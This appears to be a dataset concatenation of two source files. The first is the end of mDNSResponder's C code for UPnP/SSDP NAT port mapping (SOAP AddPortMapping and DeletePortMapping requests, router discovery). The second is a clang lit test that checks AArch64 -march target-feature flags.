else if (err == mStatus_ConnEstablished)
{
mDNS_DropLockBeforeCallback();
tcpConnectionCallback(info->sock, info, mDNStrue, mStatus_NoError);
mDNS_ReclaimLockAfterCallback();
err = mStatus_NoError;
}
else
{
// Don't need to log this in customer builds -- it happens quite often during sleep, wake, configuration changes, etc.
LogInfo("LNT MakeTCPConnection: connection failed");
mDNSPlatformTCPCloseConnection(info->sock); // Dispose the socket we created with mDNSPlatformTCPSocket() above
info->sock = mDNSNULL;
mDNSPlatformMemFree(info->Reply);
info->Reply = mDNSNULL;
}
return(err);
}
mDNSlocal unsigned int AddSOAPArguments(char *const buf, const unsigned int maxlen, const int numArgs, const Property *const a)
{
static const char f1[] = "<%s>%s</%s>";
static const char f2[] = "<%s xmlns:dt=\"urn:schemas-microsoft-com:datatypes\" dt:dt=\"%s\">%s</%s>";
int i, len = 0;
*buf = 0;
for (i = 0; i < numArgs; i++)
{
if (a[i].type) len += mDNS_snprintf(buf + len, maxlen - len, f2, a[i].name, a[i].type, a[i].value, a[i].name);
else len += mDNS_snprintf(buf + len, maxlen - len, f1, a[i].name, a[i].value, a[i].name);
}
return(len);
}
mDNSlocal mStatus SendSOAPMsgControlAction(mDNS *m, tcpLNTInfo *info, const char *const Action, const int numArgs, const Property *const Arguments, const LNTOp_t op)
{
// SOAP message header format -
// - control URL
// - action (string)
// - router's host/port ("host:port")
// - content-length
static const char header[] =
"POST %s HTTP/1.1\r\n"
"Content-Type: text/xml; charset=\"utf-8\"\r\n"
"SOAPAction: \"urn:schemas-upnp-org:service:WAN%sConnection:1#%s\"\r\n"
"User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"\r\n"
"%s\r\n";
static const char body1[] =
"<?xml version=\"1.0\"?>\r\n"
"<SOAP-ENV:Envelope"
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\""
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
"<SOAP-ENV:Body>"
"<m:%s xmlns:m=\"urn:schemas-upnp-org:service:WAN%sConnection:1\">";
static const char body2[] =
"</m:%s>"
"</SOAP-ENV:Body>"
"</SOAP-ENV:Envelope>\r\n";
mStatus err;
char *body = (char*)&m->omsg; // Typically requires 1110-1122 bytes; m->omsg is 8952 bytes, which is plenty
int bodyLen;
if (mDNSIPPortIsZero(m->UPnPSOAPPort) || m->UPnPSOAPURL == mDNSNULL || m->UPnPSOAPAddressString == mDNSNULL) // if no SOAP URL or address exists get out here
{ LogInfo("SendSOAPMsgControlAction: no SOAP port, URL or address string"); return mStatus_Invalid; }
// Create body
bodyLen = mDNS_snprintf (body, sizeof(m->omsg), body1, Action, m->UPnPWANPPPConnection ? "PPP" : "IP");
bodyLen += AddSOAPArguments(body + bodyLen, sizeof(m->omsg) - bodyLen, numArgs, Arguments);
bodyLen += mDNS_snprintf (body + bodyLen, sizeof(m->omsg) - bodyLen, body2, Action);
// Create info->Request; the header needs to contain the bodyLen in the "Content-Length" field
if (!info->Request) info->Request = mDNSPlatformMemAllocate(LNT_MAXBUFSIZE);
if (!info->Request) { LogMsg("SendSOAPMsgControlAction: Can't allocate info->Request"); return mStatus_NoMemoryErr; }
info->requestLen = mDNS_snprintf((char*)info->Request, LNT_MAXBUFSIZE, header, m->UPnPSOAPURL, m->UPnPWANPPPConnection ? "PPP" : "IP", Action, m->UPnPSOAPAddressString, bodyLen, body);
err = MakeTCPConnection(m, info, &m->Router, m->UPnPSOAPPort, op);
if (err) { mDNSPlatformMemFree(info->Request); info->Request = mDNSNULL; }
return err;
}
// Build port mapping request with new port (up to max) and send it
mDNSlocal mStatus SendPortMapRequest(mDNS *m, NATTraversalInfo *n)
{
char externalPort[6];
char internalPort[6];
char localIPAddrString[30];
char publicPortString[40];
Property propArgs[8];
mDNSu16 ReqPortNum = RequestedPortNum(n);
NATTraversalInfo *n2 = m->NATTraversals;
// Scan our m->NATTraversals list to make sure the external port we're requesting is locally unique.
// UPnP gateways will report conflicts if different devices request the same external port, but if two
// clients on the same device request the same external port the second one just stomps over the first.
// One way this can happen is like this:
// 1. Client A binds local port 80
// 2. Client A requests external port 80 -> internal port 80
// 3. UPnP NAT gateway refuses external port 80 (some other client already has it)
// 4. Client A tries again, and successfully gets external port 80 -> internal port 81
// 5. Client B on same machine tries to bind local port 80, and fails
// 6. Client B tries again, and successfully binds local port 81
// 7. Client B now requests external port 81 -> internal port 81
// 8. UPnP NAT gateway allows this, stomping over Client A's existing mapping
while (n2)
{
if (n2 == n || RequestedPortNum(n2) != ReqPortNum) n2=n2->next;
else
{
if (n->tcpInfo.retries < 100)
{
n->tcpInfo.retries++;
ReqPortNum = RequestedPortNum(n); // Pick a new port number
n2 = m->NATTraversals; // And re-scan the list looking for conflicts
}
else
{
natTraversalHandlePortMapReply(m, n, m->UPnPInterfaceID, NATErr_Res, zeroIPPort, 0);
return mStatus_NoError;
}
}
}
// create strings to use in the message
mDNS_snprintf(externalPort, sizeof(externalPort), "%u", ReqPortNum);
mDNS_snprintf(internalPort, sizeof(internalPort), "%u", mDNSVal16(n->IntPort));
mDNS_snprintf(publicPortString, sizeof(publicPortString), "iC%u", ReqPortNum);
mDNS_snprintf(localIPAddrString, sizeof(localIPAddrString), "%u.%u.%u.%u",
m->AdvertisedV4.ip.v4.b[0], m->AdvertisedV4.ip.v4.b[1], m->AdvertisedV4.ip.v4.b[2], m->AdvertisedV4.ip.v4.b[3]);
// build the message
mDNSPlatformMemZero(propArgs, sizeof(propArgs));
propArgs[0].name = "NewRemoteHost";
propArgs[0].type = "string";
propArgs[0].value = "";
propArgs[1].name = "NewExternalPort";
propArgs[1].type = "ui2";
propArgs[1].value = externalPort;
propArgs[2].name = "NewProtocol";
propArgs[2].type = "string";
propArgs[2].value = (n->Protocol == NATOp_MapUDP) ? "UDP" : "TCP";
propArgs[3].name = "NewInternalPort";
propArgs[3].type = "ui2";
propArgs[3].value = internalPort;
propArgs[4].name = "NewInternalClient";
propArgs[4].type = "string";
propArgs[4].value = localIPAddrString;
propArgs[5].name = "NewEnabled";
propArgs[5].type = "boolean";
propArgs[5].value = "1";
propArgs[6].name = "NewPortMappingDescription";
propArgs[6].type = "string";
propArgs[6].value = publicPortString;
propArgs[7].name = "NewLeaseDuration";
propArgs[7].type = "ui4";
propArgs[7].value = "0";
LogInfo("SendPortMapRequest: internal %u external %u", mDNSVal16(n->IntPort), ReqPortNum);
return SendSOAPMsgControlAction(m, &n->tcpInfo, "AddPortMapping", 8, propArgs, LNTPortMapOp);
}
mDNSexport mStatus LNT_MapPort(mDNS *m, NATTraversalInfo *const n)
{
LogInfo("LNT_MapPort");
if (n->tcpInfo.sock) return(mStatus_NoError); // If we already have a connection up don't make another request for the same thing
n->tcpInfo.parentNATInfo = n;
n->tcpInfo.retries = 0;
return SendPortMapRequest(m, n);
}
mDNSexport mStatus LNT_UnmapPort(mDNS *m, NATTraversalInfo *const n)
{
char externalPort[10];
Property propArgs[3];
tcpLNTInfo *info;
tcpLNTInfo **infoPtr = &m->tcpInfoUnmapList;
mStatus err;
// If no NAT gateway to talk to, no need to do all this work for nothing
if (mDNSIPPortIsZero(m->UPnPSOAPPort) || !m->UPnPSOAPURL || !m->UPnPSOAPAddressString) return mStatus_NoError;
mDNS_snprintf(externalPort, sizeof(externalPort), "%u", mDNSVal16(mDNSIPPortIsZero(n->RequestedPort) ? n->IntPort : n->RequestedPort));
mDNSPlatformMemZero(propArgs, sizeof(propArgs));
propArgs[0].name = "NewRemoteHost";
propArgs[0].type = "string";
propArgs[0].value = "";
propArgs[1].name = "NewExternalPort";
propArgs[1].type = "ui2";
propArgs[1].value = externalPort;
propArgs[2].name = "NewProtocol";
propArgs[2].type = "string";
propArgs[2].value = (n->Protocol == NATOp_MapUDP) ? "UDP" : "TCP";
n->tcpInfo.parentNATInfo = n;
// clean up previous port mapping requests and allocations
if (n->tcpInfo.sock) LogInfo("LNT_UnmapPort: closing previous open connection");
if (n->tcpInfo.sock ) { mDNSPlatformTCPCloseConnection(n->tcpInfo.sock); n->tcpInfo.sock = mDNSNULL; }
if (n->tcpInfo.Request) { mDNSPlatformMemFree(n->tcpInfo.Request); n->tcpInfo.Request = mDNSNULL; }
if (n->tcpInfo.Reply ) { mDNSPlatformMemFree(n->tcpInfo.Reply); n->tcpInfo.Reply = mDNSNULL; }
// make a copy of the tcpInfo that we can clean up later (the one passed in will be destroyed by the client as soon as this returns)
if ((info = mDNSPlatformMemAllocate(sizeof(tcpLNTInfo))) == mDNSNULL)
{ LogInfo("LNT_UnmapPort: can't allocate tcpInfo"); return(mStatus_NoMemoryErr); }
*info = n->tcpInfo;
while (*infoPtr) infoPtr = &(*infoPtr)->next; // find the end of the list
*infoPtr = info; // append
err = SendSOAPMsgControlAction(m, info, "DeletePortMapping", 3, propArgs, LNTPortMapDeleteOp);
if (err) DisposeInfoFromUnmapList(m, info);
return err;
}
mDNSexport mStatus LNT_GetExternalAddress(mDNS *m)
{
return SendSOAPMsgControlAction(m, &m->tcpAddrInfo, "GetExternalIPAddress", 0, mDNSNULL, LNTExternalAddrOp);
}
mDNSlocal mStatus GetDeviceDescription(mDNS *m, tcpLNTInfo *info)
{
// Device description format -
// - device description URL
// - host/port
static const char szSSDPMsgDescribeDeviceFMT[] =
"GET %s HTTP/1.1\r\n"
"Accept: text/xml, application/xml\r\n"
"User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows NT/5.1)\r\n"
"Host: %s\r\n"
"Connection: close\r\n"
"\r\n";
if (!mDNSIPPortIsZero(m->UPnPSOAPPort)) return mStatus_NoError; // already have the info we need
if (m->UPnPRouterURL == mDNSNULL || m->UPnPRouterAddressString == mDNSNULL) { LogInfo("GetDeviceDescription: no router URL or address string!"); return (mStatus_Invalid); }
// build message
if (info->Request != mDNSNULL) mDNSPlatformMemZero(info->Request, LNT_MAXBUFSIZE); // reuse previously allocated buffer
else if ((info->Request = mDNSPlatformMemAllocate(LNT_MAXBUFSIZE)) == mDNSNULL) { LogInfo("can't allocate send buffer for discovery"); return (mStatus_NoMemoryErr); }
info->requestLen = mDNS_snprintf((char*)info->Request, LNT_MAXBUFSIZE, szSSDPMsgDescribeDeviceFMT, m->UPnPRouterURL, m->UPnPRouterAddressString);
LogInfo("Describe Device: [%s]", info->Request);
return MakeTCPConnection(m, info, &m->Router, m->UPnPRouterPort, LNTDiscoveryOp);
}
// This function parses the response to our SSDP discovery message. Basically, we look to make sure this is a response
// referencing a service we care about (WANIPConnection or WANPPPConnection), then look for the "Location:" header and copy the addressing and
// URL info we need.
mDNSexport void LNT_ConfigureRouterInfo(mDNS *m, const mDNSInterfaceID InterfaceID, const mDNSu8 *const data, const mDNSu16 len)
{
const mDNSu8 *ptr = data;
const mDNSu8 *end = data + len;
const mDNSu8 *stop = ptr;
if (!mDNSIPPortIsZero(m->UPnPRouterPort)) return; // already have the info we need
// The formatting of the HTTP header is not always the same when it comes to the placement of
// the service and location strings, so we just look for each of them from the beginning for every response
// figure out if this is a message from a service we care about
while (ptr && ptr != end)
{
if ((*ptr & 0xDF) == 'W' && (strncasecmp((char*)ptr, "WANIPConnection:1", 17) == 0)) break;
ptr++;
}
if (ptr == end)
{
ptr = data;
while (ptr && ptr != end)
{
if ((*ptr & 0xDF) == 'W' && (strncasecmp((char*)ptr, "WANPPPConnection:1", 18) == 0)) break;
ptr++;
}
}
if (ptr == mDNSNULL || ptr == end) return; // not a message we care about
// find "Location:", starting from the beginning
ptr = data;
while (ptr && ptr != end)
{
if ((*ptr & 0xDF) == 'L' && (strncasecmp((char*)ptr, "Location:", 9) == 0)) break; // find the first 'L'; is this Location? if not, keep looking
ptr++;
}
if (ptr == mDNSNULL || ptr == end)
{
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.ssdp", "failure", "Location", "");
return; // not a message we care about
}
ptr += 9; //Skip over 'Location:'
while (*ptr == ' ' && ptr < end) ptr++; // skip over spaces
if (ptr >= end) return;
// find the end of the line
for (stop = ptr; stop != end; stop++) { if (*stop == '\r') { end = stop; break; } }
// fill in default port
m->UPnPRouterPort = mDNSOpaque16fromIntVal(80);
// free string pointers and set to NULL
if (m->UPnPRouterAddressString != mDNSNULL)
{
mDNSPlatformMemFree(m->UPnPRouterAddressString);
m->UPnPRouterAddressString = mDNSNULL;
}
if (m->UPnPRouterURL != mDNSNULL)
{
mDNSPlatformMemFree(m->UPnPRouterURL);
m->UPnPRouterURL = mDNSNULL;
}
// the Router URL should look something like "/dyndev/uuid:0013-108c-4b3f0000f3dc"
if (ParseHttpUrl(ptr, end, &m->UPnPRouterAddressString, &m->UPnPRouterPort, &m->UPnPRouterURL) != mStatus_NoError)
{
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.ssdp", "failure", "Parse URL", "");
return;
}
m->UPnPInterfaceID = InterfaceID;
if (m->UPnPRouterAddressString == mDNSNULL)
{
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.ssdp", "failure", "Router address", "");
LogMsg("LNT_ConfigureRouterInfo: UPnPRouterAddressString is NULL");
}
else LogInfo("LNT_ConfigureRouterInfo: Router address string [%s]", m->UPnPRouterAddressString);
if (m->UPnPRouterURL == mDNSNULL)
{
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.ssdp", "failure", "Router path", "");
LogMsg("LNT_ConfigureRouterInfo: UPnPRouterURL is NULL");
}
else LogInfo("LNT_ConfigureRouterInfo: Router URL [%s]", m->UPnPRouterURL);
LogInfo("LNT_ConfigureRouterInfo: Router port %d", mDNSVal16(m->UPnPRouterPort));
LogInfo("LNT_ConfigureRouterInfo: Router interface %d", m->UPnPInterfaceID);
// Don't need the SSDP socket anymore
if (m->SSDPSocket) { debugf("LNT_ConfigureRouterInfo destroying SSDPSocket %p", &m->SSDPSocket); mDNSPlatformUDPClose(m->SSDPSocket); m->SSDPSocket = mDNSNULL; }
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.ssdp", "success", "success", "");
// now send message to get the device description
GetDeviceDescription(m, &m->tcpDeviceInfo);
}
mDNSexport void LNT_SendDiscoveryMsg(mDNS *m)
{
static const char msg[] =
"M-SEARCH * HTTP/1.1\r\n"
"Host:239.255.255.250:1900\r\n"
"ST:urn:schemas-upnp-org:service:WAN%sConnection:1\r\n"
"Man:\"ssdp:discover\"\r\n"
"MX:3\r\n\r\n";
static const mDNSAddr multicastDest = { mDNSAddrType_IPv4, { { { 239, 255, 255, 250 } } } };
mDNSu8 *buf = (mDNSu8*)&m->omsg; //m->omsg is 8952 bytes, which is plenty
unsigned int bufLen;
if (!mDNSIPPortIsZero(m->UPnPRouterPort))
{
if (m->SSDPSocket) { debugf("LNT_SendDiscoveryMsg destroying SSDPSocket %p", &m->SSDPSocket); mDNSPlatformUDPClose(m->SSDPSocket); m->SSDPSocket = mDNSNULL; }
if (mDNSIPPortIsZero(m->UPnPSOAPPort) && !m->tcpDeviceInfo.sock) GetDeviceDescription(m, &m->tcpDeviceInfo);
return;
}
// Always query for WANIPConnection in the first SSDP packet
if (m->retryIntervalGetAddr <= NATMAP_INIT_RETRY) m->SSDPWANPPPConnection = mDNSfalse;
// Create message
bufLen = mDNS_snprintf((char*)buf, sizeof(m->omsg), msg, m->SSDPWANPPPConnection ? "PPP" : "IP");
debugf("LNT_SendDiscoveryMsg Router %.4a Current External Address %.4a", &m->Router.ip.v4, &m->ExternalAddress);
if (!mDNSIPv4AddressIsZero(m->Router.ip.v4))
{
if (!m->SSDPSocket) { m->SSDPSocket = mDNSPlatformUDPSocket(m, zeroIPPort); debugf("LNT_SendDiscoveryMsg created SSDPSocket %p", &m->SSDPSocket); }
mDNSPlatformSendUDP(m, buf, buf + bufLen, 0, m->SSDPSocket, &m->Router, SSDPPort, mDNSfalse);
mDNSPlatformSendUDP(m, buf, buf + bufLen, 0, m->SSDPSocket, &multicastDest, SSDPPort, mDNSfalse);
}
m->SSDPWANPPPConnection = !m->SSDPWANPPPConnection;
}
mDNSexport void LNT_ClearState(mDNS *const m)
{
if (m->tcpAddrInfo.sock) { mDNSPlatformTCPCloseConnection(m->tcpAddrInfo.sock); m->tcpAddrInfo.sock = mDNSNULL; }
if (m->tcpDeviceInfo.sock) { mDNSPlatformTCPCloseConnection(m->tcpDeviceInfo.sock); m->tcpDeviceInfo.sock = mDNSNULL; }
m->UPnPSOAPPort = m->UPnPRouterPort = zeroIPPort; // Reset UPnP ports
}
#endif /* _LEGACY_NAT_TRAVERSAL_ */
|
the_stack_data/568297.c | // Check target CPUs are correctly passed. Continuation of aarch64-cpus-1.c.
// NOTE: The tests are split across multiple files, to avoid excessive test
// times for large single test files.
// TODO: The files should be split up by categories, e.g. by architecture versions.
// RUN: %clang -target aarch64 -### -c %s 2>&1 | FileCheck -check-prefix=GENERIC-V8A %s
// RUN: %clang -target aarch64 -march=armv8-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERIC-V8A %s
// GENERIC-V8A: "-cc1"{{.*}} "-triple" "aarch64{{(--)?}}"{{.*}} "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8a"
// RUN: %clang -target aarch64 -march=armv8-r -### -c %s 2>&1 | FileCheck -check-prefix=GENERIC-V8R %s
// GENERIC-V8R: "-cc1"{{.*}} "-triple" "aarch64{{(--)?}}"{{.*}} "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8r"
// RUN: %clang -target aarch64 -march=armv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A %s
// RUN: %clang -target aarch64 -march=armv8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A %s
// GENERICV81A: "-cc1"{{.*}} "-triple" "aarch64{{(--)?}}"{{.*}} "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.1a"
// RUN: %clang -target arm64 -march=armv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=ARM64-GENERICV81A %s
// RUN: %clang -target arm64 -march=armv8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=ARM64-GENERICV81A %s
// RUN: %clang -target arm64 -mlittle-endian -march=armv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=ARM64-GENERICV81A %s
// RUN: %clang -target arm64 -mlittle-endian -march=armv8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=ARM64-GENERICV81A %s
// ARM64-GENERICV81A: "-cc1"{{.*}} "-triple" "arm64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.1a"
// RUN: %clang -target aarch64_be -march=armv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64_be -march=armv8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64 -march=armv8.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A %s
// RUN: %clang -target aarch64 -march=armv8.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A %s
// GENERICV82A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.2a"
// RUN: %clang -target aarch64_be -march=armv8.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-BE %s
// RUN: %clang -target aarch64_be -march=armv8.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-BE %s
// GENERICV82A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.2a"
// RUN: %clang -target aarch64 -march=armv8.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-NO-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-NO-FP16FML %s
// GENERICV82A-NO-FP16FML-NOT: "-target-feature" "{{[+-]}}fp16fml"
// GENERICV82A-NO-FP16FML-NOT: "-target-feature" "{{[+-]}}fullfp16"
// RUN: %clang -target aarch64 -march=armv8.2a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.2-a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16 %s
// GENERICV82A-FP16: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.2a" "-target-feature" "+fullfp16"
// GENERICV82A-FP16-NOT: "-target-feature" "{{[+-]}}fp16fml"
// GENERICV82A-FP16-SAME: {{$}}
// RUN: %clang -target aarch64 -march=armv8.2-a+profile -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-SPE %s
// GENERICV82A-SPE: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.2a" "-target-feature" "+spe"
// RUN: %clang -target aarch64 -march=armv8a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-NO-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-NO-FP16FML %s
// GENERICV8A-NO-FP16FML-NOT: "-target-feature" "{{[+-]}}fp16fml"
// GENERICV8A-NO-FP16FML-NOT: "-target-feature" "{{[+-]}}fullfp16"
// RUN: %clang -target aarch64 -march=armv8a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-FP16 %s
// RUN: %clang -target aarch64 -march=armv8-a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-FP16 %s
// GENERICV8A-FP16-NOT: "-target-feature" "{{[+-]}}fp16fml"
// GENERICV8A-FP16: "-target-feature" "+fullfp16"
// GENERICV8A-FP16-NOT: "-target-feature" "{{[+-]}}fp16fml"
// GENERICV8A-FP16-SAME: {{$}}
// RUN: %clang -target aarch64 -march=armv8a+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8-a+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-FP16FML %s
// GENERICV8A-FP16FML: "-target-feature" "+fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.2a+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.2-a+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16FML %s
// GENERICV82A-FP16FML: "-target-feature" "+fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.2a+fp16+nofp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16-NO-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.2-a+fp16+nofp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16-NO-FP16FML %s
// GENERICV82A-FP16-NO-FP16FML: "-target-feature" "+fullfp16" "-target-feature" "-fp16fml"
// RUN: %clang -target aarch64 -march=armv8.2a+nofp16fml+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-NO-FP16FML-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.2-a+nofp16fml+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-NO-FP16FML-FP16 %s
// GENERICV82A-NO-FP16FML-FP16: "-target-feature" "-fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.2a+fp16fml+nofp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16FML-NO-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.2-a+fp16fml+nofp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16FML-NO-FP16 %s
// GENERICV82A-FP16FML-NO-FP16: "-target-feature" "-fullfp16" "-target-feature" "-fp16fml"
// RUN: %clang -target aarch64 -march=armv8.2a+nofp16+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-NO-FP16-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.2-a+nofp16+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-NO-FP16-FP16FML %s
// GENERICV82A-NO-FP16-FP16FML: "-target-feature" "+fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.2a+fp16+profile -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16-SPE %s
// RUN: %clang -target aarch64 -march=armv8.2-a+fp16+profile -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV82A-FP16-SPE %s
// GENERICV82A-FP16-SPE: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.2a" "-target-feature" "+fullfp16" "-target-feature" "+spe"
// GENERICV82A-FP16-SPE-NOT: "-target-feature" "{{[+-]}}fp16fml"
// GENERICV82A-FP16-SPE-SAME: {{$}}
// RUN: %clang -target aarch64 -march=armv8.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A %s
// RUN: %clang -target aarch64 -march=armv8.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A %s
// GENERICV83A: "-cc1"{{.*}} "-triple" "aarch64{{(--)?}}"{{.*}} "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.3a"
// RUN: %clang -target aarch64_be -march=armv8.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-BE %s
// RUN: %clang -target aarch64_be -march=armv8.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-BE %s
// GENERICV83A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.3a"
// RUN: %clang -target aarch64 -march=armv8.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-NO-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-NO-FP16FML %s
// GENERICV83A-NO-FP16FML-NOT: "-target-feature" "{{[+-]}}fp16fml"
